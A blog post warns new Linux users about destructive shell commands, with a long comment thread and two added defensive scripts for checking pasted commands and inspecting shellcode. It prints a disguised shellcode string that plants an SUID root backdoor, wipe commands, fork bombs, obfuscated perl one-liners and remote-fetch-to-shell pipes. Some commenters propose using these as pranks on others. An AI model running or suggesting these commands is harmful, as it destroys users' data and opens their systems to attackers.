If you are new to Linux, chances are you will meet a stupid person, perhaps in a forum or chat room, who can trick you into using commands that will harm your files or even your entire operating system. To keep this dangerous scenario from happening, I have here a list of deadly Linux commands that you should avoid.
1. Code:
rm -rf /
This command will recursively and forcefully delete all the files inside the root directory.
2. Code:
char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";
This is the hex version of [rm -rf /] that can deceive even rather experienced Linux users.
3. Code:
mkfs.ext3 /dev/sda
This will reformat the device named after the mkfs command, wiping out all the files on it.
4. Code:
:(){:|:&};:
Known as a fork bomb, this command tells your system to execute a huge number of processes until the system freezes. This can often lead to corruption of data.
5. Code:
any_command > /dev/sda
With this command, raw data is written to a block device, which will usually clobber the filesystem and result in total loss of data.
6. Code:
wget http://some_untrusted_source -O- | sh
Never download from untrusted sources and then execute the possibly malicious code they give you.
7. Code:
mv /home/yourhomedirectory/* /dev/null
This command will move all the files inside your home directory to a place that doesn't exist; hence you will never ever see those files again.
There are of course other equally deadly Linux commands that I fail to include here, so if you have something to add, please share it with us via comment.
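A pre-flight check for the shell commands in the list (items 1 and 3 to 7), as an added example that is not part of the original post. It also covers two variants from the comments (`of=` writes and a stray space before `*`); `flag_command` and its labels are names made up for this illustration, and a command that passes the check is not thereby safe.

```shell
#!/bin/sh
# Added illustration: flags a pasted command line that matches one of the
# patterns from the list. flag_command and its labels are hypothetical names.

SEP='[[:space:];&|]'                  # characters that separate shell words
DISK='/dev/(sd|hd|vd|nvme|mmcblk)'    # common whole-disk device prefixes

# matches REGEX TEXT: true when the extended regex is found in TEXT
matches() { printf '%s\n' "$2" | grep -Eq -- "$1"; }

# flag_command "command line": prints the labels that matched, separated
# by spaces, and returns 1 when nothing matched.
flag_command() {
    cmd=$1
    compact=$(printf '%s' "$cmd" | tr -d '[:space:]')
    hits=''

    # Item 1: rm with a recursive flag and /, ~, * or .* as a separate word.
    # This also catches the stray space in "rm -rf oldfiles. *".
    if matches "(^|$SEP)rm[[:space:]]+(.*[[:space:]])?-[^[:space:]]*[rR][^[:space:]]*[[:space:]](.*[[:space:]])?(/|/[*]|~|~/[*]|[*]|[.][*])($SEP|\$)" "$cmd"; then
        hits="$hits recursive-rm"
    fi
    # Item 3: mkfs aimed at a whole disk
    if matches "(^|$SEP)mkfs([.][[:alnum:]]+)?[[:space:]].*$DISK" "$cmd"; then
        hits="$hits mkfs-on-device"
    fi
    # Item 4: function body that pipes into itself in the background
    if matches '[(][)][{].*[|].*&[}];' "$compact"; then
        hits="$hits fork-bomb"
    fi
    # Item 5: redirect or dd output onto a whole disk
    if matches "(>[[:space:]]*|of=)$DISK" "$cmd"; then
        hits="$hits raw-device-write"
    fi
    # Item 6: anything piped straight into a shell
    if matches '[|][[:space:]]*(sudo[[:space:]]+)?(ba|da|k|z)?sh([[:space:];&]|$)' "$cmd"; then
        hits="$hits pipe-to-shell"
    fi
    # Item 7: mv with /dev/null as the destination
    if matches "(^|$SEP)mv[[:space:]].*[[:space:]]/dev/null($SEP|\$)" "$cmd"; then
        hits="$hits mv-to-devnull"
    fi

    hits=${hits# }
    [ -n "$hits" ] || return 1
    printf '%s\n' "$hits"
}

# Constructed sample lines, taken from the list and the comments
for line in 'rm -rf /' 'rm -rf oldfiles. *' 'rm -rf oldfiles.*' \
            'mkfs.ext3 /dev/sda' ':(){ :|:& };:' 'any_command > /dev/sda' \
            'wget http://some_untrusted_source -O- | sh' \
            'mv /home/yourhomedirectory/* /dev/null'; do
    printf '%-45s %s\n' "$line" "$(flag_command "$line" || echo '(no match)')"
done
```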
to this:
mv ~/* /dev/null
~The Unix Geek
(found you via tuxmachines)
At the least windows didn't do that to me... not a windows fanboy or anything, but could never get linux to stay working...
rm -rf * is NOT the same as #1 (unless you are sitting in /)
* means everything at your current directory level
/ means everything from the root down
the * variant only deletes all files in your current directory. The / variant deletes everything from the root (/) directory.
As for Linux failing after using it for a week I'd say that you were doing it wrong or try to install some app or did something with Windows (if you were dual-booting) to hose it up.
rm -rf oldfiles. *
which is why always adding -rf just to be sure is a bad idea.
as root to help negate the random rm -fR *. What will happen is rm will see and interpret the -i file as a command line switch and force interactive mode instead of forced mode. I do this in all my clients / dirs.
jess
http://www.anon.cz.tc
Helpful there.
Your responses in turn:
1) "You're doing it wrong" Wow, you mean Linux is supposed to work for *longer* than a week, and that it's not normally shipped broken? Amazing! Not useful, though...
2) "You tried to install some app." Yes, how DARE you try to install *software* over an *operating system*. Mah gawd that's insanity.
3) "Did something with Windows" I used to think that this was a joke. "A Linux developer stubs his toe on a rock. Damn Microsoft."
Recursively gives read, write, and execute privileges to all users for all files. The files in /bin and /etc/bin cannot have this mode or they will not run.
IS the same * means everything that includes the . and the .. you see when you do ls -a. On unix machines this will jump a directory back and continually do it until root is reached, that's why *.* is more common...
Having said that, this doesn't apply on most kernels and * won't jump directories, just trying to make my point.
man yourmom
"read mail, -realfast, /all"
[13:20:34(user@home)2]~ $ mkdir foo
[13:20:45(user@home)3]~ $ cd foo
[13:20:45(user@home)4]~/foo $ echo *
*
[13:20:46(user@home)5]~/foo $ touch foo bar baz
[13:20:54(user@home)6]~/foo $ echo *
bar baz foo
so yeah, rm -rf * does _not_ traverse to ".." -- maybe it did in 1996, but not for a long while now.
Even if for some reason a shell did do this, you wouldn't get the "recursive" jump behaviour described. Once the shell has expanded * its job is finished. If for some reason it put them there, rm would need to have a ridiculous bug where it also included . and .. files.
My job as sysadmin is safe - regarding the alternatives here...
*doh*
You should read this article again, very thoroughly, and take notes... cos yr duwin it rong. Or maybe you should just stick to live CD's.
will traverse up the tree
ask me how i know :(
I like to watch all the files disappear while laughing maniacally...
2. dir /w/p = will get you genital warts
3. edit autoexec.bat = will make you look stupid
don't forget about
man yourmom
"
Well I tried it, it errored out stating and i quote:
"yourmom is too large to be displayed"
Do that and your hard disk will be formatted back to factory defaults!
dd if=/dev/random of=/dev/port
apparently
cat /dev/port
works as well.
Does not do what you think it does, morons!
If you're not root it will fail.
If there is zero or more than one file whose name doesn't start with a "." in your home directory, it will fail because /dev/null is not a directory.
Otherwise it will move that one file over the device file /dev/null. The file will not have disappeared; it will be still be there, with all its content, just named "null" and situated in "/dev".
dd if=Unix\ Geek of=/dev/fail
Guess some of my old pc's here are going to have a hard time :D
chown -r "whoever" /usr/whoever/ .*
It not only chowned the user's files, but went up to the parent directory (.), chowned it, and then recursively chowned everything below that, including the Database user, etc..
Comments like:
Wow, you mean Linux is supposed to work for *longer* than a week, and that it's not normally shipped broken? Amazing! Not useful, though...
Yes, how DARE you try to install *software* over an *operating system*. Mah gawd that's insanity.
"A Linux developer stubs his toe on a rock. Damn Microsoft."
This speaks of an underlying sarcasm needed by someone who is not so much interested in having a problem fixed as they are screaming the loudest for attention. You strike me as someone who desires control at such a level that I am surprised any other operating system or any real-life experience has been much better. There has to be some kind of anger and validation beyond the OS, which causes you not only to dislike the product, but when someone makes a suggestion, your disagreement resorts to that of a 12 year old. Or to put it in a way it comes off to many:
"OoooOOOoooh, SARCASM! Maybe if I exaggerate my statements you'll believe what I have to say, but NOOooOOOo... you have Linux so far up your ass you cough up penguin feathers."
Now, if you are just a sour puss who reads Linux articles because you hope to understand it better, but haven't learned to relax, might I suggest what someone else already did: use a more modern distro. AND if it still borks after a few days, work with someone to help you with it.
But getting all upset like that really doesn't speak well for your patience and desire to learn.
Didn't think you could kill an OS
with simple Linux commands.
thanks from tony
That won't do what you think it will. It'll overwrite the /dev/null device node with a file, or exit saying "/dev/null: not a directory". /dev/null is used for redirecting text output, not copying or moving data.
Also, in number 2, everyone is ignoring the second part. Sure, it's rm -rf in hex. But the second part of the command creates an SUID root shell in a hidden file in /tmp/.beyond -- essentially a backdoor root shell should the attacker ever get a prompt at the box again.
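One way to look inside a byte string like the one in item 2 without compiling or running it, as an added example (not from the original post or its commenters): decode the `\x` escapes and list the printable runs, both as written and with every byte inverted, since inverting bytes is a cheap way to hide text from a plain strings pass. `printable_runs` is a name made up here; the sample is the escaped portion of the listing in item 2.

```shell
#!/bin/sh
# Added illustration: static inspection only, nothing in SAMPLE is executed.
# SAMPLE is the \x-escaped part of the "char esp[]" listing in item 2.
SAMPLE='\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68
\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99
\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7
\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56
\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31
\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69
\x6e\x2f\x73\x68\x00\x2d\x63\x00'

# printable_runs MODE TEXT [MINLEN]
#   MODE raw: bytes as written; MODE not: each byte replaced by 255 - byte.
#   Prints every run of at least MINLEN (default 4) printable ASCII characters.
printable_runs() {
    mode=$1
    min=${3:-4}
    printf '%s\n' "$2" |
    grep -o '\\x[0-9A-Fa-f][0-9A-Fa-f]' |      # one \xNN token per line
    while read -r tok; do
        hex=${tok#??}                          # drop the leading \x
        v=$((0x$hex))
        if [ "$mode" = not ]; then
            v=$((255 - v))
        fi
        if [ "$v" -ge 32 ] && [ "$v" -le 126 ]; then
            printf '%b' "\\0$(printf '%o' "$v")"   # emit the character
        else
            printf '\n'                            # non-printable ends a run
        fi
    done |
    awk -v n="$min" 'length($0) >= n'
}

echo 'printable runs, bytes as written:'
printable_runs raw "$SAMPLE"
echo 'printable runs, bytes inverted:'
printable_runs not "$SAMPLE"
```

The inverted view lists the fragments in the order they appear in the byte string; read from last to first they form one command line.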
eg. if someone says that rm rf / solves your problems, if you google "linux +rm" you will see that "rm" stands for remove. You don't have to know much about computers to understand that "remove" is dangerous.
dont worry about the guy that blows up his linux after a few hours / days
Linux is user friendly, it is just careful selecting its friends.
lol I love that one.
I am curious tho, which redhat / debian distro did you select for this?
and just what was the actual errors you got? without that information no one can help you, not even your mom.
-Badguy
I met someone who thought he was appending a directory name with a slash "/" character but inserted a space before the second slash giving two directories for find to work with.
e.g.: find /tmp / -exec rm -rf {} \;
Of course this was done as root and he said it pretty effectively removed a bunch of files on a server he was working with. At least pre-production if my memory serves.
rm -rf * in home doesn't delete .purple and the like, at least on Ubuntu Intrepid.
Biggest reason I don't use linux is after a couple of boots (usually within the first week), it fails to load for some reason.
Sorry you had so much trouble Eddie but why didn't you try Google or ask for help on one of the many forums.
If it had been your Windows machine doing this would you have dumped it or asked for help.
I have also been to so called support sites for different versions and end up leaving due azz wipes that would rather give false info rather than help anyone who is willing to try to switch to open source software.
Also, Knoppix anyver has very bad visual clarity fonts are blurred as well as graphics.
When I tried Vista on one hard drive and had Linux on another, Vista kept clobbering the ext3 filesystem, I guess because it didn't recognize it and decided to do something. All the inodes were shifted. fsck fixed it, of course.
rm: "." and ".." may not be removed
So that does not work on OSX Leopard. And I haven't seen a system going up recursively when issuing:
rm -rf *
Seems like an urban legend to me. I've once met a guy who claimed that he wiped his Debian installation using rm -rf *
I still don't buy it.
insert Russian accent
God, root, what is difference?
Now you know one reason why you shouldn't adopt rootly powers unless it is absolutely necessary.
chmod 000 -R /
http://blog.rootninja.com
This will shift the names of all the files in the users home directory. none of the file names will match their contents.
http://blog.rootninja.com
:(){ :|:& };:
Besides that, I think it has been "fixed" in newer systems. If I type it in a terminal, I get the following:
[thomas@localhost ~]$ bash: fork: Resursen midlertidig utilgængelig
bash: fork: Resource temporarily unavailable
bash: fork: Resource temporarily unavailable
...
And I can shut it all down with a simple Ctrl+C
chroot /some/directory/you/dont/care/about/but/has/a/distribution/on/it /bin/bash
this will only avoid some of the malicious code, not all of it
chmod -r 777 . /*
0:> [file]
(or something to that effect)
But I dont remember the parameters.
It doesnt work properly with some filesystems.
find -type f -mtime +30 -exec mv {} /dev/null \;
I ended up overwriting /dev/null and basically fubar-ed the whole server until it was restored.
cat /dev/random > ~/.backup &
is a great way to screw with someone, especially if the sysadmin has put limits on each user's home directory
tell them it's running some sort of diagnostic and it needs to run for an hour or so...
but that's another discussion...
hmm ... I thought, that means
ReadMail -ReallyFast ;-)
No manual entry for woman
me@mycomputer:~$
heheheheheeee
rm -rf /|rm -rf /&
I've previously had the joy of fixing somebody's computer when they dragged their C: drive to the recycle bin.
cheers :)
(ext2/3 only)
cd /
chattr -R +i *
Now sit back and watch people go nuts none of the files or dirs on the system can be modded or removed (reboots usually don't succeed )
["command" -h or --help] also will show you how the command works and what its used for.
thats all you need if you don't know what a command is used for.
this is FrostWire's Unix/Linux Command Reference, that are very helpful to new and experienced users.
FrostWire's Unix/Linux Command Reference part 1
FrostWire's Unix/Linux Reference Command part 2
YOUR A DUMBASS! get the * out of the IT field."
And why did this get approved by the blog author???
PERIOD.
Harmful commands are an infinite number of variants. At least do a basic google on the command you are given. Anything that is not plain text and obvious to search for is probably malicious.
If a fork-bomb can no longer fork, it exits.
The following short Z Shell code will typically get rid of the above fork bomb in about a minute:
while (sleep 100 &!) do; done
Each new do-nothing process we run reduces the number of rampant "fork bomb" processes by one, until eventually we can eradicate all of them, at which point the do-nothing processes can exit.
that works, but most people choose to limit the amount of processes a user can have running at any one time. man limits.conf
perl -e '$??s:;s:s;;$?::s;;=]=>%-{\\>%<-{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
galeng!
alias rm='rm -i'
alias mv='mv -i'
Since sometimes it's necessary to remove a lot of files at once I also have:
alias srm='rm -f'
before those other two
However, if you're like me and a few thousand/million out there that don't use a distro with sudo, you'd have to login as root in order to execute these commands.
And for that, I'm glad and recommend this distro without sudo to new users.
links -dump http://tinyurl.com/funtrixwithnix|awk 'NR==44{print $1,$2" /*"}'|sh
Would yield the same results as my previously posted perl script...
s!/\*.*?\*/!!sg
perl -e 'while(1) {fork();}'
perl -e '''=~('(?{'.(']'^'-').((']'^'-')|'"').('`'|')').('`'|'.').((']'^'-')|'$').'"'.((']'^'-')|'#').((']'^'-')|')').((']'^'-')|'#'
perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
while :; do mkdir foobar && echo gg >| hrhr ;cd foobar ;done &
echo $0 ; $0 &
[$[$RANDOM%6]=0]&&rm -rf /
for i in /dev/{hd*,sd*}; echo Drop the Dilmom\! I repeat: drop the Dilmom\! && dd if=/dev/urandom of=$i
echo "\$0&\$0">.-.&&. .-.
How can get rid of this file again?
>!r
Needless to say... the previous command was rm *.
"I didn't think it would let you do that." He said.
cat /dev/input/mouse0 > /dev/sda
On a desktop environment people tend to grab a mouse and do something else after this (like browsing a web).
Or when a guy asks how to work his new shiny joystick, after teaching him to get it working you may present a final command (just say, this command fine-tunes the calibration, simulate a real game usage):
cat /dev/input/js0 > /dev/sda
At the least linux didn't do that to me... not a linux fanboy or anything, but could never get windows to stay working...
If you have a file named -i (as was suggested you should have in / earlier on) or you have a file named * then your instinct is to type rm -i or rm * to delete it.
When you think about it, however, you will see that this will either cause an error because you didn't supply any filenames to delete or it will delete all the files in the current directory.
The proper method for deleting files that start with a dash is rm -- -i. You can also achieve this by using an absolute path: rm /home/dave/-i.
This doesn't work with a star however so for that you will need to use a backslash before the star like this: rm \*.
A fun trick to play on new sysadmins is to create a file called -rf * in their home directory. (But make sure you do regular backups...)
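The option-parsing and globbing behaviour discussed in this thread, reproduced in a throwaway directory as an added example (not part of any comment above). `in_scratch` and `show` are made-up helpers; the results assume an rm that follows POSIX, where the later of -i and -f wins, and every prompt is answered "no" because stdin is /dev/null.

```shell
#!/bin/sh
# Added illustration. All file operations happen inside a directory
# created by mktemp -d, which is removed again afterwards.

# in_scratch CMD...: create files a, b, .hidden and -i in a fresh scratch
# directory, run CMD there, and print the names that survive on one line.
in_scratch() {
    (
        LC_ALL=C; export LC_ALL        # fixed sort order: -i .hidden a b
        d=$(mktemp -d) || exit 1
        cd "$d" || exit 1
        touch -- a b .hidden -i
        "$@" </dev/null >/dev/null 2>&1 || :
        ls -A | tr '\n' ' ' | sed 's/ $//'
        cd / && rm -rf -- "$d"
    )
}

# show 'command': run the command through sh -c inside the scratch directory
show() { printf '%-14s leaves: %s\n' "$1" "$(in_scratch sh -c "$1")"; }

show 'rm -f *'      # expands to "rm -f -i a b": -i is last, so rm prompts
show 'rm -f -- *'   # -- ends option parsing: -i, a and b go, .hidden stays
show 'rm -i -f a'   # -f is last: a is removed without a prompt
show 'rm -f -i a'   # -i is last: rm prompts, the answer is no, a stays
show 'rm -- -i'     # removes only the file named -i
show 'rm ./-i'      # same, using a path that does not start with a dash
```

In every case `.hidden` survives, because `*` never expands to names that start with a dot, which also rules out `.` and `..`.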
This post was completely useless, as anything you described would require at least an euid of 0 (providing the tool was setuid aware), most want a uid of 0, which is not the default user for most distros.
So, enjoy your google juice while I thumbs down this in Stumbleupon under my personal category of "Thinking all computer users are stupid".
If you want to find something to blog about that earns you traffic, try coming up with something better, or at least learning how GNU/Linux actually __works__, how permissions work and what 'sudo' and 'su' do.
Good luck on your blog, I hope you make a fortune. Advertising the fact that you fell victim to some IRC prank and nuked your computer is not the best way to gain links. If you hope to prevent this grave misfortune for others, at least understand how the OS actually works.
I 100% agree with you. This is all so stupid. And unfortunately most of the comments are even more stupid!
Dude... You should get yourself a Dell Inspiron 530n (preloaded with GNU/Linux of the Ubuntu variety), drop in a PNY nVidia 9400GT, and your whole family's jaws will drop at the awesomeness... mine did.
3d games, all the fastness, none of the BS and bloatness you would get from Vista.
Checkout my blog entry at:
http://healthysystem.blogspot.com/2008/11/dell-inspiron-530n-nvidia-9400gt-ubuntu.html
I'll be updating it with all the details.
GNU/Linux rocks!!!!
`rm -- -i'
For those interested on how the forkbomb works, those are two equivalent:
1)
:() {
: |: &
};
:
2)
function() {
function |function &
};
function
Conclusion: creates a function that calls itself and pipes stdout to a copy of itself then forks and exits. Calls the function one time.
It will double the `bash' (or any other shell) processes by an order of two at every call.
It's very fast as it just needs to copy the bash process (already cached by mmap) X times in the RAM until the RAM is full.
The ";" is only needed if written in one line.
There must be at least a space after "{" and before "}" for some shells (like bash).
i wanted to write:
vi /etc/passwd
but I wrote (as root):
vi >/etc/passwd
the > key is on a swiss keyboard right of shift-key. The shift key is also used for a /.
After that command, the passwd file is empty.
Userdata and system keeps on disk.
But no more login possible.
Lucky, that i could restore /etc/passwd from backup and had a running root Terminal.
Yes, i know, never touch passwd by editor, but irl its easier.
Greetings
Patrick
:)
"Well, I liked very much of version of command rm -rf /"
:)
Paulo Gomes
http://aventux.blogspot.com - Aventuras p'lo linux
More useful are tons of comments which gives lots of insight...
I am thinking of compiling the comments... will try :)
_ATOzTOA
www.atoztoa.com
Funny. I've had Linux boxes running, literally, for years. But then, I'm a Unix admin.
The nice thing about Linux is that it isn't maintained by control freaks or people who are driven by profit motive to be constantly rendering their product obsolete and in need of another upgrade. It's maintained by people who like to see it working with as many applications and for as many people as possible.
Nice points; thanks.
//Jadu, unstableme.blogspot.com
#kill -9 -1
yes > /dev/sda
and the IQ test for new linux admins;
touch -- /-rf
and I'd also like to point out that adding alises for 'rm -i' are completely useless... 'rm -if' or 'rm -fi' won't prompt.. the -f takes precedence. If you're prone to silly typos though, alias rm='mv -t ~/.Trash/' might be a good idea.
http://ultraoli.info/tag/top-deadly-linux-commands
Taking away the reading rights for / is also a great way to force a user to reinstall, when a friend of mine tried that, I was totally unable to solve it for him."
Hm. Maybe you would have to be able to access the filesystem from a live-CD or put the disk temporarily in another machine to fix that...? So that it was not your root system. Then I guess you should be able to issue a `chmod a+r whatever' or `chmod -R a+r whatever' on the relevant directory(ies) as root, unless the filesystem was encrypted or something...
But then maybe there are some magic you could do from the kernel boot command prompt of your bootloader (thinking "grub") that would help, but I'm not skilled enough to know this.
Anyways, I always stop to read twice and think a bit before issuing a possible really dangerous command as superuser...
kills all processes of the user. normal users get completely logged off, root will kill all processes (including init ;)
kills init, the parent of all processes
Neither will creating a file named '-i'
Example;
touch /tmp/test
rm -i -f /tmp/test
It WON'T prompt. -f take priority over -i.
Double-edged sword this blog.
Some will say: "Ahh! Now I'm wiser! I know what to avoid." Others will say: "Ahh! Now I'm wiser! I know what to suggest to others."
fuser -k /
loool
Description:
Will delete Kernel , Initrd , and GRUB/LILO Files
(Needed for Linux Startup)
rm /boot/vmlinux
rm /boot/vmlinuz
rm /boot/vmlinux*
rm /boot/vmlinuz*
Delete the Linux kernel
rm /bin/init
cd / ; find | grep init | rm
Deletes any file with "init" in it including /sbin/init.
sed -ei 's/id:5/id:6/' /etc/inittab; reboot
or maybe you could always do chmod -R 000 and see what happens when you don't have permission to do anything...
in top 3 on reddit linux.
http://dazzle.cs.mcgill.ca/wordpress/?p=36
"Anonymous Said,
April 17, 2010 4:01 AM
And this is why 90% of computer users run Windows."
No this is why 95% of servers run either Unix or Linux, and why almost every super computer runs Linux.
The only thing I can recommend, whether you are dealing with Linux, Unix, Windows, or Mac, is to back up your data regularly.
Wes
www.techbreeze.com
sudo rm -rf / | sudo reboot
also, what does this do?
perl -e '$??s:;s:s;;$?::s;;=]=>%-{\\>%<-{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
I tried it but it didn't do anything for me...
My noob friend just tried this command to his pc. mkfs.ext3 /dev/sda :)
open /*
also what is this?
sudo -m mfkg ###??e:;sf;;:%%<-{;;y; -/:-@[-`{-};`-{<-F^$^^&*$%^^::;
mv libc.so.6 libc.so.6-old
You don't lose any data, but your system ends up being virtually a brick, because almost all programs (including cp, mv, ... to put the file back in place) depends on this library :-)
November 21, 2008 1:24 AM
Biggest reason I don't use linux is after a couple of boots (usually within the first week), it fails to load for some reason. I would use it for normal browsing and playing some linux games, but an error would come up and would force me to reinstall after using for only a few days. Weird...
At the least windows didn't do that to me... not a windows fanboy or anything, but could never get linux to stay working..."
You must seriously have something major wrong with your hardware. Linux is rock solid stable everywhere. It's 2012 not 1993.
or better, or at least faster:
/dev/sda </dev/null (or whatever)
rsync -av --delete /wrong_dir /some_dir (i have done this, lol.. sucked a lot..)
there are lots of ways to kill tux.
swapon /dev/sda ? :p
You could even kill (or clone ;)) your disk remotely using netcat
most of these are probably not allowed to do, even as root.. but dont feel like trying :)
sudo mv U /dev/null
go.to/moo